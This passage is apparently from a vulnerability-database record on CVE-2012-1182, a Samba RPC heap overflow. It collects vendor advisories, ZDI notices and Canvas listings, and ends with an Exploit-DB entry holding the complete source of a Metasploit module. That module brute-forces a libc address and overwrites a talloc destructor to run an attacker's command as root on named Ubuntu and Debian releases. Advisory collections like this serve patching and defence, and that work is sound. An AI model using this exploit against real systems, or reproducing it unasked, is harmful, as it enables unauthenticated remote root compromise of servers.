suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\nto generate code to handle RPC calls, resulted 
in multiple buffer overflows\nin Samba. A remote, unauthenticated attacker could send a specially-crafted\nRPC request that would cause the Samba daemon (smbd) to crash or, possibly,\nexecute arbitrary code with the privileges of the root user.\n(CVE-2012-1182)\n\nUsers of Samba are advised to upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. After installing this\nupdate, the smb service will be restarted automatically.\n", "modified": "2018-06-06T20:24:30", "published": "2012-04-10T04:00:00", "id": "RHSA-2012:0465", "href": "https://access.redhat.com/errata/RHSA-2012:0465", "type": "redhat", "title": "(RHSA-2012:0465) Critical: samba security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "canvas": [{"lastseen": "2016-09-25T14:13:35", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "description": "**Name**| CVE_2012_1182_NONX \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182-NONX \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: Samba \nRepeatability: Repeatable \nDate public: 04/10/2012 \nCVE Url: N/A \nCVSS: 0.0 \n\n", "edition": 1, "modified": "2012-04-10T17:55:02", "published": "2012-04-10T17:55:02", "id": "CVE_2012_1182_NONX", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182_NONX", "type": "canvas", "title": "Immunity Canvas: CVE_2012_1182_NONX", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T19:48:22", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "description": "**Name**| CVE_2012_1182 \n---|--- \n**CVE**| CVE-2012-1182 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| CVE-2012-1182 \n**Notes**| References: http://www.samba.org \nCVE Name: CVE-2012-1182 \nVENDOR: 
Samba \nRepeatability: Repeatable \nDate Public: 04/10/2012 \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-CVE-2012-1182 \nCVSS: 0.0 \n\n", "edition": 2, "modified": "2012-04-10T21:55:00", "published": "2012-04-10T21:55:00", "id": "CVE_2012_1182", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/CVE_2012_1182", "title": "Immunity Canvas: CVE_2012_1182", "type": "canvas", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "freebsd": [{"lastseen": "2019-05-29T18:33:51", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "\nSamba development team reports:\n\nSamba versions 3.6.3 and all versions previous to this\n\t are affected by a vulnerability that allows remote code\n\t execution as the \"root\" user from an anonymous connection.\nAs this does not require an authenticated connection it\n\t is the most serious vulnerability possible in a program,\n\t and users and vendors are encouraged to patch their Samba\n\t installations immediately.\n\n", "edition": 4, "modified": "2012-04-10T00:00:00", "published": "2012-04-10T00:00:00", "id": "BAF37CD2-8351-11E1-894E-00215C6A37BB", "href": "https://vuxml.freebsd.org/freebsd/baf37cd2-8351-11e1-894e-00215c6a37bb.html", "title": "samba -- \"root\" credential remote code execution", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "fedora": [{"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": " Samba 4 is the ambitious next version of the Samba suite that is being developed in parallel to the stable 3.0 series. The main emphasis in this branch is support for the Active Directory logon protocols used by Windows 2000 and above. 
", "modified": "2012-05-03T07:32:37", "published": "2012-05-03T07:32:37", "id": "FEDORA:77AFB20FC7", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 15 Update: samba4-4.0.0-26.alpha11.fc15.6", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "zdi": [{"lastseen": "2020-06-22T11:40:01", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL DFS INFO3 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-06-22T00:00:00", "published": "2012-04-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-061/", "id": "ZDI-12-061", "title": "Samba ndr_pull_dfs_Info3 Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:41:02", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL SVCCTL StartServiceW request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. 
This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-06-22T00:00:00", "published": "2012-04-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-063/", "id": "ZDI-12-063", "title": "Samba NDR PULL SVCCTL StartServiceW Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:59", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL LSA TrustDomainInfoControllers request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-06-22T00:00:00", "published": "2012-04-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-062/", "id": "ZDI-12-062", "title": "Samba NDR PULL LSA TrustDomainInfoControllers Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-22T11:40:05", "bulletinFamily": "info", "cvelist": ["CVE-2012-1182"], "edition": 3, "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Samba. Authentication is not required to exploit this vulnerability. The specific flaw exists within Samba's handling of a NDR PULL DFS EnumArray1 request. By sending a specially crafted packet, it is possible to cause Samba to use a different size for memory allocation than it uses for a memory copy loop. 
This can result in memory corruption, and may be exploited by an attacker to gain remote code execution.", "modified": "2012-06-22T00:00:00", "published": "2012-04-18T00:00:00", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-064/", "id": "ZDI-12-064", "title": "Samba NDR PULL DFS EnumArray1 Heap Overflow Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:39:45", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "[3.5.10-115]\n- Security Release, fixes CVE-2012-1182\n- resolves: #804644", "edition": 4, "modified": "2012-04-10T00:00:00", "published": "2012-04-10T00:00:00", "id": "ELSA-2012-0465", "href": "http://linux.oracle.com/errata/ELSA-2012-0465.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:48", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "[3.0.33-3.36.el4]\n- Security Release, fixes CVE-2012-1182\n- resolves: #812010", "edition": 4, "modified": "2012-04-16T00:00:00", "published": "2012-04-16T00:00:00", "id": "ELSA-2012-0478", "href": "http://linux.oracle.com/errata/ELSA-2012-0478.html", "title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:59", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "[4.0.0-55.rc4]\r\n- Fix dependencies of samba4-test package.\r\n- related: #896142\r\n \n[4.0.0-54.rc4]\r\n- Fix summary and description of dc subpackages.\r\n- resolves: #896142\r\n- Remove conflicting libsmbclient.7 manpage.\r\n- resolves: #896240\r\n \n[4.0.0-53.rc4]\r\n- Fix provides filter rules to remove conflicting libraries from samba4-libs.\r\n- resolves: #895718\r\n \n[4.0.0-52.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: 
#864889\r\n \n[4.0.0-51.rc4]\r\n- Make sure we use the same directory as samba package for the winbind pipe.\r\n- resolves: #886157\r\n \n[4.0.0-50.rc4]\r\n- Fix typo in winbind-krb-locator post uninstall script.\r\n- related: #864889\r\n \n[4.0.0-49.rc4]\r\n- Fix Netlogon AES encryption.\r\n- resolves: #885089\r\n \n[4.0.0-48.rc4]\r\n- Fix IPA trust AD lookup of users.\r\n- resolves: #878564\r\n \n[4.0.0-47.rc4]\r\n- Add require for krb5-libs >= 1.10 to samba4-libs.\r\n- resolves: #877533\r\n \n[4.0.0-46.rc4]\r\n- Rename /etc/sysconfig/samba4 to name to mach init scripts.\r\n- resolves: #877085\r\n \n[4.0.0-45.rc4]\r\n- Don't require samba4-common and samba4-test in samba4-devel package.\r\n- related: #871748\r\n \n[4.0.0-44.rc4]\r\n- Make libnetapi and internal library to fix dependencies.\r\n- resolves: #873491\r\n \n[4.0.0-43.rc4]\r\n- Move libnetapi and internal printing migration lib to libs package.\r\n- related: #766333\r\n \n[4.0.0-42.rc4]\r\n- Fix perl, pam and logrotate dependencies.\r\n- related: #766333\r\n \n[4.0.0-41.rc4]\r\n- Fix library dependencies found by rpmdiff.\r\n- Update winbind offline logon patch.\r\n- related: #766333\r\n \n[4.0.0-40.rc4]\r\n- Move libgpo to samba-common\r\n- resolves: #871748\r\n \n[4.0.0-39.rc4]\r\n- Rebase to version 4.0.0rc4.\r\n- related: #766333\r\n \n[4.0.0-38.rc3]\r\n- Add missing export KRB5CCNAME in init scripts.\r\n- resolves: #868419\r\n \n[4.0.0-37.rc3]\r\n- Move /var/log/samba to samba-common package for winbind which\r\n requires it.\r\n- resolves: #868248\r\n \n[4.0.0-36.rc3]\r\n- The standard auth modules need to be built into smbd to function.\r\n- resolves: #867854\r\n \n[4.0.0-35.rc3]\r\n- Move pam_winbind.conf to the package of the module.\r\n- resolves: #867317\r\n \n[4.0.0-34.rc3]\r\n- Built auth_builtin as static module.\r\n- related: #766333\r\n \n[4.0.0-33.rc3]\r\n- Add back the AES patches which didn't make it in rc3.\r\n- related: #766333\r\n \n[4.0.0-32.rc3]\r\n- Rebase to version 
4.0.0rc3.\r\n- related: #766333\r\n \n[4.0.0-31.rc2]\r\n- Use alternatives to configure winbind_krb5_locator.so\r\n- resolves: #864889\r\n \n[4.0.0-30.rc2]\r\n- Fix multilib package installation.\r\n- resolves: #862047\r\n- Filter out libsmbclient and libwbclient provides.\r\n- resolves: #861892\r\n- Rebase to version 4.0.0rc2.\r\n- related: #766333\r\n \n[4.0.0-29.rc1]\r\n- Fix Requires and Conflicts.\r\n- related: #766333\r\n \n[4.0.0-28.rc1]\r\n- Move pam_winbind and wbinfo manpages to the right subpackage.\r\n- related: #766333\r\n \n[4.0.0-27.rc1]\r\n- Fix permission for init scripts.\r\n- Define a common KRB5CCNAME for smbd and winbind.\r\n- Set piddir back to /var/run in RHEL6.\r\n- related: #766333\r\n \n[4.0.0-26.rc1]\r\n- Add '-fno-strict-aliasing' to CFLAGS again.\r\n- related: #766333\r\n \n[4.0.0-25.rc1]\r\n- Build with syste libldb package which has been just added.\r\n- related: #766333\r\n \n[4.0.0-24.rc1]\r\n- Rebase to version 4.0.0rc1.\r\n- resolves: #766333", "edition": 4, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "ELSA-2013-0506", "href": "http://linux.oracle.com/errata/ELSA-2013-0506.html", "title": "samba4 security, bug fix and enhancement update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:35:34", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "evolution-mapi\r\n[0.28.3-12]\r\n- Add patch for RH bug #903241 (Double-free on message copy/move)\r\n \n[0.28.3-11]\r\n- Add patch for RH bug #902932 (Cannot connect with latest samba)\r\n \n[0.28.3-10]\r\n- Drop multilib by obsoleting evolution-mapi < 0.28.3-9 (RH bug #886914).\r\n \n[0.28.3-9]\r\n- Adapt to OpenChange 1.0 (RH bug #767678).\r\n \n[0.28.3-8]\r\n- Add patch for RH bug #680061 (crash while setting props).\r\n \nopenchange\r\n[1.0-4]\r\n- Use current version (1.0-4) for a multilib obsolete (RH bug #881698).\r\n \n[1.0-3]\r\n- Add patch to be able to send 
large messages (RH bug #870405)\r\n \n[1.0-2]\r\n- Drop multilib by obsoleting openchange < 0.9 (RH bug #881698).\r\n \n[1.0-1]\r\n- Rebase to 1.0 using the rpm spec from Fedora 18.", "edition": 4, "modified": "2013-02-27T00:00:00", "published": "2013-02-27T00:00:00", "id": "ELSA-2013-0515", "href": "http://linux.oracle.com/errata/ELSA-2013-0515.html", "title": "openchange security, bug fix and enhancement update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "ubuntu": [{"lastseen": "2020-07-08T23:37:41", "bulletinFamily": "unix", "cvelist": ["CVE-2012-1182"], "description": "Brian Gorenc discovered that Samba incorrectly calculated array bounds when \nhandling remote procedure calls (RPC) over the network. A remote, \nunauthenticated attacker could exploit this to execute arbitrary code as the \nroot user. (CVE-2012-1182)", "edition": 5, "modified": "2012-04-13T00:00:00", "published": "2012-04-13T00:00:00", "id": "USN-1423-1", "href": "https://ubuntu.com/security/notices/USN-1423-1", "title": "Samba vulnerability", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T17:25:25", "description": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow. CVE-2012-1182. Remote exploit for linux platform", "published": "2012-10-10T00:00:00", "type": "exploitdb", "title": "Samba SetInformationPolicy AuditEventsInfo Heap Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-1182"], "modified": "2012-10-10T00:00:00", "id": "EDB-ID:21850", "href": "https://www.exploit-db.com/exploits/21850/", "sourceData": "##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# web site for more information on licensing and terms of use.\r\n# http://metasploit.com/\r\n##\r\n\r\n\r\nrequire 'msf/core'\r\n\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = NormalRanking\r\n\r\n\tinclude Msf::Exploit::Remote::DCERPC\r\n\tinclude Msf::Exploit::Remote::SMB\r\n\tinclude Msf::Exploit::Brute\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Samba SetInformationPolicy AuditEventsInfo Heap Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module triggers a vulnerability in the LSA RPC service of the Samba daemon\r\n\t\t\t\tbecause of an error on the PIDL auto-generated code. Making a specially crafted\r\n\t\t\t\tcall to SetInformationPolicy to set a PolicyAuditEventsInformation allows to\r\n\t\t\t\ttrigger a heap overflow and finally execute arbitrary code with root privileges.\r\n\r\n\t\t\t\tThe module uses brute force to guess the system() address and redirect flow there\r\n\t\t\t\tin order to bypass NX. The start and stop addresses for brute forcing have been\r\n\t\t\t\tcalculated empirically. 
On the other hand the module provides the StartBrute and\r\n\t\t\t\tStopBrute which allow the user to configure his own addresses.\r\n\t\t\t},\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # Vulnerability discovery\r\n\t\t\t\t\t'blasty', # Exploit\r\n\t\t\t\t\t'mephos', # Debian Squeeze target\r\n\t\t\t\t\t'sinn3r', # Metasploit module\r\n\t\t\t\t\t'juan vazquez' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t['CVE', '2012-1182'],\r\n\t\t\t\t\t['OSVDB', '81303'],\r\n\t\t\t\t\t['BID', '52973'],\r\n\t\t\t\t\t['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-069/']\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'DisableNops' => true,\r\n\t\t\t\t\t'Space' => 811,\r\n\t\t\t\t\t'Compat' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'PayloadType' => 'cmd',\r\n\t\t\t\t\t\t\t'RequiredCmd' => 'generic bash telnet python perl'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'unix',\r\n\t\t\t'Arch' => ARCH_CMD,\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# gdb /usr/sbin/smbd `ps auwx | grep smbd | grep -v grep | head -n1 | awk '{ print $2 }'` <<< `echo -e \"print system\"` | grep '$1'\r\n\t\t\t\t\t['2:3.5.11~dfsg-1ubuntu2 and 2:3.5.8~dfsg-1ubuntu2 on Ubuntu 11.10',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start for the final version should be 0xb20 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230b20 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00b20 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.8~dfsg-1ubuntu2 and 2:3.5.4~dfsg-1ubuntu8 on Ubuntu 11.04',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x950 aligned, and then step 
0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230950 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00950 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.4~dfsg-1ubuntu8 on Ubuntu 10.10',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x680 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0x00230680 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0x22a00680 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t],\r\n\t\t\t\t\t['2:3.5.6~dfsg-3squeeze6 on Debian Squeeze',\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'Offset' => 0x11c0,\r\n\t\t\t\t\t\t\t'Bruteforce' =>\r\n\t\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\t# The start should be 0x680 aligned, and then step 0x1000.\r\n\t\t\t\t\t\t\t\t'Start' => { 'Ret' => 0xb6aaa1b0 },\r\n\t\t\t\t\t\t\t\t'Stop' => { 'Ret' => 0xb6ce91b0 },\r\n\t\t\t\t\t\t\t\t'Step' => 0x1000\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Apr 10 2012',\r\n\t\t\t'DefaultTarget' => 0\r\n\t\t\t))\r\n\r\n\t\tregister_options([\r\n\t\t\tOptInt.new(\"StartBrute\", [ false, \"Start Address For Brute Forcing\" ]),\r\n\t\t\tOptInt.new(\"StopBrute\", [ false, \"Stop Address For Brute Forcing\" ])\r\n\t\t], self.class)\r\n\r\n\tend\r\n\r\n\tdef exploit\r\n\t\tif target.bruteforce?\r\n\t\t\tbf = target.bruteforce\r\n\r\n\t\t\tif datastore['StartBrute'] and datastore['StartBrute'] > 0\r\n\t\t\t\tbf.start_addresses['Ret'] = datastore['StartBrute']\r\n\t\t\tend\r\n\r\n\t\t\tif datastore['StopBrute'] and datastore['StopBrute'] > 0\r\n\t\t\t\tbf.stop_addresses['Ret'] = datastore['StopBrute']\r\n\t\t\tend\r\n\r\n\t\t\tif bf.start_addresses['Ret'] > bf.stop_addresses['Ret']\r\n\t\t\t\traise ArgumentError, \"StartBrute should not be larger than StopBrute\"\r\n\t\t\tend\r\n\t\tend\r\n\t\tsuper\r\n\tend\r\n\r\n\tdef 
check\r\n\t\tbegin\r\n\t\t\tconnect()\r\n\t\t\tsmb_login()\r\n\t\t\tdisconnect()\r\n\r\n\t\t\tversion = smb_peer_lm().scan(/Samba (\\d\\.\\d.\\d*)/).flatten[0]\r\n\t\t\tminor = version.scan(/\\.(\\d*)$/).flatten[0].to_i\r\n\t\t\tprint_status(\"Version found: #{version}\")\r\n\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.4/ and minor < 16\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.5/ and minor < 14\r\n\t\t\treturn Exploit::CheckCode::Appears if version =~ /^3\\.6/ and minor < 4\r\n\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\r\n\t\trescue ::Exception\r\n\t\t\treturn CheckCode::Unknown\r\n\t\tend\r\n\tend\r\n\r\n\tdef brute_exploit(target_addrs)\r\n\r\n\t\tprint_status(\"Trying to exploit Samba with address 0x%.8x...\" % target_addrs['Ret'])\r\n\t\tdatastore['DCERPC::fake_bind_multi'] = false\r\n\t\tdatastore['DCERPC::max_frag_size'] = 4248\r\n\r\n\t\tpipe = \"lsarpc\"\r\n\r\n\t\tprint_status(\"Connecting to the SMB service...\")\r\n\t\tconnect()\r\n\t\tprint_status(\"Login to the SMB service...\")\r\n\t\tsmb_login()\r\n\r\n\t\thandle = dcerpc_handle('12345778-1234-abcd-ef00-0123456789ab', '0.0', 'ncacn_np', [\"\\\\#{pipe}\"])\r\n\t\tprint_status(\"Binding to #{handle} ...\")\r\n\t\tdcerpc_bind(handle)\r\n\t\tprint_status(\"Bound to #{handle} ...\")\r\n\r\n\t\tstub = \"X\" * 20\r\n\r\n\t\tcmd = \";;;;\" # padding\r\n\t\tcmd << \"#{payload.encoded}\\x00\" # system argument\r\n\t\ttmp = cmd * (816/cmd.length)\r\n\t\ttmp << \"\\x00\"*(816-tmp.length)\r\n\r\n\t\tstub << NDR.short(2) # level\r\n\t\tstub << NDR.short(2) # level 2\r\n\t\tstub << NDR.long(1) # auditing mode\r\n\t\tstub << NDR.long(1) # ptr\r\n\t\tstub << NDR.long(100000) # r-> count\r\n\t\tstub << NDR.long(20) # array size\r\n\t\tstub << NDR.long(0)\r\n\t\tstub << NDR.long(100)\r\n\t\tstub << rand_text_alpha(target['Offset'])\r\n\t\t# Crafted talloc chunk\r\n\t\tstub << 'A' * 8 # next, prev\r\n\t\tstub << NDR.long(0) + NDR.long(0) # parent, child\r\n\t\tstub << 
NDR.long(0) # refs\r\n\t\tstub << NDR.long(target_addrs['Ret']) # destructor # will become EIP\r\n\t\tstub << NDR.long(0) # name\r\n\t\tstub << \"AAAA\" # size\r\n\t\tstub << NDR.long(0xe8150c70) # flags\r\n\t\tstub << \"AAAABBBB\"\r\n\t\tstub << tmp # pointer to tmp+4 in $esp\r\n\t\tstub << rand_text(32632)\r\n\t\tstub << rand_text(62000)\r\n\r\n\t\tprint_status(\"Calling the vulnerable function...\")\r\n\r\n\t\tbegin\r\n\t\t\tcall(dcerpc, 0x08, stub)\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::NoResponse, Rex::Proto::SMB::Exceptions::NoReply, ::EOFError\r\n\t\t\tprint_status('Server did not respond, this is expected')\r\n\t\trescue Rex::Proto::DCERPC::Exceptions::Fault\r\n\t\t\tprint_error('Server is most likely patched...')\r\n\t\trescue => e\r\n\t\t\tif e.to_s =~ /STATUS_PIPE_DISCONNECTED/\r\n\t\t\t\tprint_status('Server disconnected, this is expected')\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\t# Perform a DCE/RPC Function Call\r\n\tdef call(dcerpc, function, data, do_recv = true)\r\n\r\n\t\tfrag_size = data.length\r\n\t\tif dcerpc.options['frag_size']\r\n\t\t\tfrag_size = dcerpc.options['frag_size']\r\n\t\tend\r\n\t\tobject_id = ''\r\n\t\tif dcerpc.options['object_call']\r\n\t\t\tobject_id = dcerpc.handle.uuid[0]\r\n\t\tend\r\n\t\tif options['random_object_id']\r\n\t\t\tobject_id = Rex::Proto::DCERPC::UUID.uuid_unpack(Rex::Text.rand_text(16))\r\n\t\tend\r\n\r\n\t\tcall_packets = make_request(function, data, frag_size, dcerpc.context, object_id)\r\n\t\tcall_packets.each { |packet|\r\n\t\t\twrite(dcerpc, packet)\r\n\t\t}\r\n\r\n\t\treturn true if not do_recv\r\n\r\n\t\traw_response = ''\r\n\r\n\t\tbegin\r\n\t\t\traw_response = dcerpc.read()\r\n\t\trescue ::EOFError\r\n\t\t\traise Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\tend\r\n\r\n\t\tif (raw_response == nil or raw_response.length == 0)\r\n\t\t\traise Rex::Proto::DCERPC::Exceptions::NoResponse\r\n\t\tend\r\n\r\n\r\n\t\tdcerpc.last_response = 
Rex::Proto::DCERPC::Response.new(raw_response)\r\n\r\n\t\tif dcerpc.last_response.type == 3\r\n\t\t\te = Rex::Proto::DCERPC::Exceptions::Fault.new\r\n\t\t\te.fault = dcerpc.last_response.status\r\n\t\t\traise e\r\n\t\tend\r\n\r\n\t\tdcerpc.last_response.stub_data\r\n\tend\r\n\r\n\t# Used to create standard DCERPC REQUEST packet(s)\r\n\tdef make_request(opnum=0, data=\"\", size=data.length, ctx=0, object_id = '')\r\n\r\n\t\topnum = opnum.to_i\r\n\t\tsize = size.to_i\r\n\t\tctx = ctx.to_i\r\n\r\n\t\tchunks, frags = [], []\r\n\t\tptr = 0\r\n\r\n\t\t# Break the request into fragments of 'size' bytes\r\n\t\twhile ptr < data.length\r\n\t\t\tchunks.push( data[ ptr, size ] )\r\n\t\t\tptr += size\r\n\t\tend\r\n\r\n\t\t# Process requests with no stub data\r\n\t\tif chunks.length == 0\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, '', ctx, object_id) )\r\n\t\t\treturn frags\r\n\t\tend\r\n\r\n\t\t# Process requests with only one fragment\r\n\t\tif chunks.length == 1\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(3, opnum, chunks[0], ctx, object_id) )\r\n\t\t\treturn frags\r\n\t\tend\r\n\r\n\t\t# Create the first fragment of the request\r\n\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(1, opnum, chunks.shift, ctx, object_id) )\r\n\r\n\t\t# Create all of the middle fragments\r\n\t\twhile chunks.length != 1\r\n\t\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(0, opnum, chunks.shift, ctx, object_id) )\r\n\t\tend\r\n\r\n\t\t# Create the last fragment of the request\r\n\t\tfrags.push( Rex::Proto::DCERPC::Packet.make_request_chunk(2, opnum, chunks.shift, ctx, object_id) )\r\n\r\n\t\treturn frags\r\n\tend\r\n\r\n\t# Write data to the underlying socket\r\n\tdef write(dcerpc, data)\r\n\t\tdcerpc.socket.write(data)\r\n\t\tdata.length\r\n\tend\r\n\r\nend\r\n\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": 
